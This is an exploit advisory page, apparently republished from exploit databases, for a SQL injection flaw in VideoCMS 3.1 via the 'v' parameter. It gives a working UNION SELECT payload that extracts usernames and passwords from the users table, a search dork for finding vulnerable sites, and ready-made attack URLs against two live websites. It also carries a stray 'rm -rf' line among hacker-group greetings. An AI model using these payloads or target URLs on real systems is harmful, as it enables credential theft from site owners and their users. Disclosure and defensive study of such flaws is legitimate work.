VideoCMS SQL injection vulnerability

2009.12.30
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################################################### # [~] VideoCMS SQL injection vulnerability - (id) # [~] Author : kaMtiEz (kamzcrew@gmail.com) # [~] Homepage : http://www.indonesiancoder.com # [~] Date : Desember 14, 2009 # # ################################################################################### [ Software Information ] [+] Vendor : http://www.codemight.com/ [+] Download : - [+] version : 3.1 or lower maybe also affected [+] Vulnerability : SQL injection [+] Dork : "Think iT" [+] Price : dunno [+] Location : INDONESIA - JOGJA [+] description http://www.codemight.com/index.php?m=product&p=1 ################################################################################## [ HERE WE GO .. LIVE FROM JOGJA CITY ] [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL] [ Exploit ] /**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users-- [ Demo ] http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users-- http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users-- =========================================================================== [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry .. [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader, [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Nyak ama babe gua .. tak lupa adik gua .. [+] segelas vodka menemaniku setiap malam .. :P [+] Dengerin Radio yach di http://antisecradio.fm ok coy ? [ QUOTE ] [+] rm -rf [ EOF ] [+] INDONESIANOCODER TEAM [+] KILL -9 TEAM

References:

http://www.exploit-db.com/exploits/10586
http://secunia.com/advisories/37889
http://packetstormsecurity.org/0912-exploits/videocms-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top